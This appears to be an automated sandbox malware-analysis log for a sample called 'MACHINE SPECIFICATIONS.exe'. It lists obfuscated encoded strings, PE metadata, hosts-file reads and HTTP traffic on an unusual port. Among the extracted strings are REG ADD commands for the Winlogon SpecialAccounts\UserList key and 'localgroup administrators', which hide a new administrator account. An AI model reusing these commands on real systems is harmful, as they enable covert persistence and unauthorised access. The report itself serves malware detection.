'QnNrZGxxaGJ7eipqaGd7fGR8d31gNWNkcXd9O1ROUj9DTk5MVgVVV0lKTwtFXg5ORlBbX1VXWlIYX1VJHA8KHyIxMmMWAgRnISQrLCk+biA+PSty', 'Q25sd3ZkdXMoaG5heX56YnV/ZjNhZn95fzlSSFA9fXBMTlADV1VHRE0JQ1gMTFhOWV1TUVhQFlFXSxoJCB1cTzBhEAQGZS8qKS4vOGwiICMpcA==', 'U2B2dnZkcm5nZypqaGd7fGR8d31gNWNkcXd9O1ROUj9DTk5MVgVVV0lKTwtFXg5ORlBbX1VXWlIYX1VJHA8KHyIxMmMWAgRnISQrLCk+biA+PSty', 'SFJOI2JsanNte2Nlay1nfDBwZHJ9eXd1dHw6fXNvPi0UAUBTVAV0YGoJQ0ZNSktcEF5cX00U', 'SHRnI2lqYm5uYG95LGR9L3Fnc3p4dHR7fTl8dG49LCsAQ1JTBHdhZQhAR0pLSF0PX19eShU=', 'U253cWdgJndhcW9nLGthfX1wZjN9ZjZ5d206aGltbnBSVUdHBEdfB1xBTwtKREJbVUMc', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl7dXg9LykAQ1JTBEJURlFaSUpASA5GXVBVVkcVUFhKGUpJU15bTDMoLCRlZR8oPWk5IyM4IitwNzshJyF2NDc3LD4uKX4rCARCCgkEAQJIHQVLCx8PFgMSEx8RVQMEERcdWzkbGBrj9fGuusL05vH66erg6KA=', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxw
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.3.unpack, E6ou21sp/mtEC31vu.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.3.unpack, E6ou21sp/y78voWXF.csBase64 encoded string: 'SW9hbHZ3Y2R8KVhMTi14bnxkdzNxe2Jyanx+Nzxwa2xUAUBGBBULFR0cCw=='
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/AC5KZsZF.csBase64 encoded string: 'SW9hbHZ3Y2R8KVhMTi14bnxkdzNxe2Jyanx+Nzxwa2xUAUBGBBULFR0cCw==', 'VGlnI21oZ2BtKX1iYGEubXUxYXtmfHh8fX06eWU9bHpNTlRKSkIGV0FRT0dfDVlGRFkSQERQVV5eUF9fHF5RUy8zYiU2KitnIT1tOGwvIT00NCAgeg=='
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/u0033Cv8rtWX.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/vmpGX47v.csBase64 encoded string: 'SWxjZGElfGhnZCpmeX56L3J0MnFxYWFyfXc6Kiw9f3FEARcTFAAGBg==', 'QW1uI1dwdndne35uaC1IYGJ8c2dnaTw5cml9IDYzdG9FRhkJCkdLVxMDBExFSxUFHkFcVA8fGENRXwEREklXWSY9CBMBAmZqaAMlIiI5bh84PiY8Myc3JzAwOXsZJS46EhURQyMXCRIYFUBFBh0JVFpfGAMREgo1NSlaVlwqFxHk7vXwpMfv8+Xo+vemo+zi4O3V2tK1u7fb9vfr6c777dbEguTWxNbPwcrZi+XD2srC0trS2tLTl/7WyNbdycKV7qarpbiViIDo5Oqbo7+6rrK9t/OasKKgt6ux+5uvv6+IiIGQmM/Il4aOlr+lq6jP3dGmkpOSk5PYsJeam5jeuWltZyNCanRqaX12ISJ5Z2krOzxnfXNwa1l1djtadHJ6UwEKCQoPD1sCBwA=', 'QW1uI1dwdndne35uaC1IYGJ8c2dnaTw5cml9IDYzdG9FRhkJCkdLVxMDBExFSxUFHkFcVA8fGENRXwEREklXWSY9CBMBAmZqaAMlIiI5bh84PiY8Myc3JzAwOXsZJS46EhURQyMXCRIYFUBFBh0JVFpfGAMREgo1NSlaVlwqFxHk7vXwpMfv8+Xo+vemo+zi4O3V2tK1u7fb9vfr6c777dbEguTWxNbPwcrZi+XD2srC0trS2tLTl/7WyNbdycKV7qarpbiViIDo5Oqbo7+6rrK9t/OasKKgt6ux+5uvv6+IiIGQmM/Il4aOlr+lq6jP3dGmkpOSk5PYsJeam5jeuWltZyNCanRqaX12ISJ5Z2krOzxnfXNwa1l1djtadHJ6UwEKCQoPD1sCBwA=', 'SWxjZGEldXNpfWN4eGRtfDB4YTN1Y3d+dHh4d3k9eHBSARAXBEdWVwh7bWkMRENOV1RBE1tbWk4Z', 'Q25ubHYlYG5kfW95ZWNpL3NwfDN2cDZ2aGl2cnl5PmtPARAXBEdWVwh7bWkMRENOV1RBE1tbWk4Z', 'RXRhb21hY2ZmKWlkYGJ8L3Z4fmdxZ395fzl5enI9fHoAQFJTSExDQwhdRQseGQ5NQEESYXN3Fl5VWF1eTx1RUSw4Yw==', 'Q2ljbWpganQob2NneGh8Zn52MnB1ezZ1fTl7a2xxd3pEAVZMBBcSB0pZWgt+amwPWVxTVFFGFlhWVUMa', 'QnNrZGxxaGJ7eipqaGd7fGR8d31gNWNkcXd9O1ROUj9DTk5MVgVVV0lKTwtFXg5ORlBbX1VXWlIYX1VJHA8KHyIxMmMWAgRnISQrLCk+biA+PSty', 'Q25sd3ZkdXMoaG5heX56YnV/ZjNhZn95fzlSSFA9fXBMTlADV1VHRE0JQ1gMTFhOWV1TUVhQFlFXSxoJCB1cTzBhEAQGZS8qKS4vOGwiICMpcA==', 'U2B2dnZkcm5nZypqaGd7fGR8d31gNWNkcXd9O1ROUj9DTk5MVgVVV0lKTwtFXg5ORlBbX1VXWlIYX1VJHA8KHyIxMmMWAgRnISQrLCk+biA+PSty', 'SFJOI2JsanNte2Nlay1nfDBwZHJ9eXd1dHw6fXNvPi0UAUBTVAV0YGoJQ0ZNSktcEF5cX00U', 'SHRnI2lqYm5uYG95LGR9L3Fnc3p4dHR7fTl8dG49LCsAQ1JTBHdhZQhAR0pLSF0PX19eShU=', 'U253cWdgJndhcW9nLGthfX1wZjN9ZjZ5d206aGltbnBSVUdHBEdfB1xBTwtKREJbVUMc', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl7dXg9LykAQ1JTBEJURlFaSUpASA5GXVBVVkcVUFhKGUpJU15bTDMoLCRlZR8oPWk5IyM4IitwNzshJyF2NDc3LD4uKX4rCARCCgkEAQJIHQVLCx8PFgMSEx8RVQMEERcdWzkbGBrj9fGuusL05vH66erg6KA=', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxw
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/p34sqIEC.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/uHFmWqpG.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/u0039u7HvIWG.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/D5Gq3JZC.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/y78voWXF.csBase64 encoded string: 'SW9hbHZ3Y2R8KVhMTi14bnxkdzNxe2Jyanx+Nzxwa2xUAUBGBBULFR0cCw=='
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/rKssIt3o.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/omA5CsZE.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/mtEC31vu.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/v9AX5C4E.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/uA1ItnCm.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.2.unpack, E6ou21sp/p34sqIEC.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.2.unpack, E6ou21sp/uHFmWqpG.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.2.unpack, E6ou21sp/u0039u7HvIWG.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.2.unpack, E6ou21sp/D5Gq3JZC.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.2.unpack, E6ou21sp/y78voWXF.csBase64 encoded string: 'SW9hbHZ3Y2R8KVhMTi14bnxkdzNxe2Jyanx+Nzxwa2xUAUBGBBULFR0cCw=='
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.2.unpack, E6ou21sp/AC5KZsZF.csBase64 encoded string: 'SW9hbHZ3Y2R8KVhMTi14bnxkdzNxe2Jyanx+Nzxwa2xUAUBGBBULFR0cCw==', 'VGlnI21oZ2BtKX1iYGEubXUxYXtmfHh8fX06eWU9bHpNTlRKSkIGV0FRT0dfDVlGRFkSQERQVV5eUF9fHF5RUy8zYiU2KitnIT1tOGwvIT00NCAgeg=='
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.2.unpack, E6ou21sp/u0033Cv8rtWX.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.2.unpack, E6ou21sp/v9AX5C4E.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.2.unpack, E6ou21sp/uA1ItnCm.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.2.unpack, E6ou21sp/rKssIt3o.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.2.unpack, E6ou21sp/omA5CsZE.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.2.unpack, E6ou21sp/vmpGX47v.csBase64 encoded string: 'SWxjZGElfGhnZCpmeX56L3J0MnFxYWFyfXc6Kiw9f3FEARcTFAAGBg==', 'QW1uI1dwdndne35uaC1IYGJ8c2dnaTw5cml9IDYzdG9FRhkJCkdLVxMDBExFSxUFHkFcVA8fGENRXwEREklXWSY9CBMBAmZqaAMlIiI5bh84PiY8Myc3JzAwOXsZJS46EhURQyMXCRIYFUBFBh0JVFpfGAMREgo1NSlaVlwqFxHk7vXwpMfv8+Xo+vemo+zi4O3V2tK1u7fb9vfr6c777dbEguTWxNbPwcrZi+XD2srC0trS2tLTl/7WyNbdycKV7qarpbiViIDo5Oqbo7+6rrK9t/OasKKgt6ux+5uvv6+IiIGQmM/Il4aOlr+lq6jP3dGmkpOSk5PYsJeam5jeuWltZyNCanRqaX12ISJ5Z2krOzxnfXNwa1l1djtadHJ6UwEKCQoPD1sCBwA=', 'QW1uI1dwdndne35uaC1IYGJ8c2dnaTw5cml9IDYzdG9FRhkJCkdLVxMDBExFSxUFHkFcVA8fGENRXwEREklXWSY9CBMBAmZqaAMlIiI5bh84PiY8Myc3JzAwOXsZJS46EhURQyMXCRIYFUBFBh0JVFpfGAMREgo1NSlaVlwqFxHk7vXwpMfv8+Xo+vemo+zi4O3V2tK1u7fb9vfr6c777dbEguTWxNbPwcrZi+XD2srC0trS2tLTl/7WyNbdycKV7qarpbiViIDo5Oqbo7+6rrK9t/OasKKgt6ux+5uvv6+IiIGQmM/Il4aOlr+lq6jP3dGmkpOSk5PYsJeam5jeuWltZyNCanRqaX12ISJ5Z2krOzxnfXNwa1l1djtadHJ6UwEKCQoPD1sCBwA=', 'SWxjZGEldXNpfWN4eGRtfDB4YTN1Y3d+dHh4d3k9eHBSARAXBEdWVwh7bWkMRENOV1RBE1tbWk4Z', 'Q25ubHYlYG5kfW95ZWNpL3NwfDN2cDZ2aGl2cnl5PmtPARAXBEdWVwh7bWkMRENOV1RBE1tbWk4Z', 'RXRhb21hY2ZmKWlkYGJ8L3Z4fmdxZ395fzl5enI9fHoAQFJTSExDQwhdRQseGQ5NQEESYXN3Fl5VWF1eTx1RUSw4Yw==', 'Q2ljbWpganQob2NneGh8Zn52MnB1ezZ1fTl7a2xxd3pEAVZMBBcSB0pZWgt+amwPWVxTVFFGFlhWVUMa', 'QnNrZGxxaGJ7eipqaGd7fGR8d31gNWNkcXd9O1ROUj9DTk5MVgVVV0lKTwtFXg5ORlBbX1VXWlIYX1VJHA8KHyIxMmMWAgRnISQrLCk+biA+PSty', 'Q25sd3ZkdXMoaG5heX56YnV/ZjNhZn95fzlSSFA9fXBMTlADV1VHRE0JQ1gMTFhOWV1TUVhQFlFXSxoJCB1cTzBhEAQGZS8qKS4vOGwiICMpcA==', 'U2B2dnZkcm5nZypqaGd7fGR8d31gNWNkcXd9O1ROUj9DTk5MVgVVV0lKTwtFXg5ORlBbX1VXWlIYX1VJHA8KHyIxMmMWAgRnISQrLCk+biA+PSty', 'SFJOI2JsanNte2Nlay1nfDBwZHJ9eXd1dHw6fXNvPi0UAUBTVAV0YGoJQ0ZNSktcEF5cX00U', 'SHRnI2lqYm5uYG95LGR9L3Fnc3p4dHR7fTl8dG49LCsAQ1JTBHdhZQhAR0pLSF0PX19eShU=', 'U253cWdgJndhcW9nLGthfX1wZjN9ZjZ5d206aGltbnBSVUdHBEdfB1xBTwtKREJbVUMc', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl7dXg9LykAQ1JTBEJURlFaSUpASA5GXVBVVkcVUFhKGUpJU15bTDMoLCRlZR8oPWk5IyM4IitwNzshJyF2NDc3LD4uKX4rCARCCgkEAQJIHQVLCx8PFgMSEx8RVQMEERcdWzkbGBrj9fGuusL05vH66erg6KA=', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxw
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.2.unpack, E6ou21sp/mtEC31vu.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6648:120:WilError_01
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: MACHINE SPECIFICATIONS.exeStatic file information: File size 1190912 > 1048576
                        Source: MACHINE SPECIFICATIONS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: MACHINE SPECIFICATIONS.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                        Source: MACHINE SPECIFICATIONS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: E:\A\_work\974\s\artifacts\NuGet.Frameworks\16.0\obj\release\net472\NuGet.Frameworks.pdb source: MACHINE SPECIFICATIONS.exe
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00FEDC7E push eax; retf 0_2_00FEDC87
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00FEDCA8 push eax; retf 0_2_00FEDCE0
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00FEDC88 push eax; retf 0_2_00FEDC87
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00D9B10A push esp; iretd 0_2_00D9B161
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00D9D4D8 pushad ; retf 0_2_00D9D4D9
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00D9C57C pushfd ; ret 0_2_00D9C5D1
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00D9C538 push esp; ret 0_2_00D9C551
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00D9AF67 push esp; iretd 0_2_00D9B161
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00D90F00 push esp; ret 0_2_00D90F01
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 1_2_00FEDC7E push eax; retf 1_2_00FEDC87
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 1_2_00FEDCA8 push eax; retf 1_2_00FEDCE0
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 1_2_00FEDC88 push eax; retf 1_2_00FEDC87
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 1_2_016FF8A0 push ecx; ret 1_2_016FF8B2
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 1_2_0580D91B push A405853Eh; retf 1_2_0580D925
                        Source: MACHINE SPECIFICATIONS.exeStatic PE information: 0xD2658D38 [Sat Nov 8 23:37:28 2081 UTC]
                        Source: initial sampleStatic PE information: section name: .text entropy: 7.11216408113

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: localgroup administrators aREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49739
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49739
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49739
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49739
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49750
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49750
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 17910
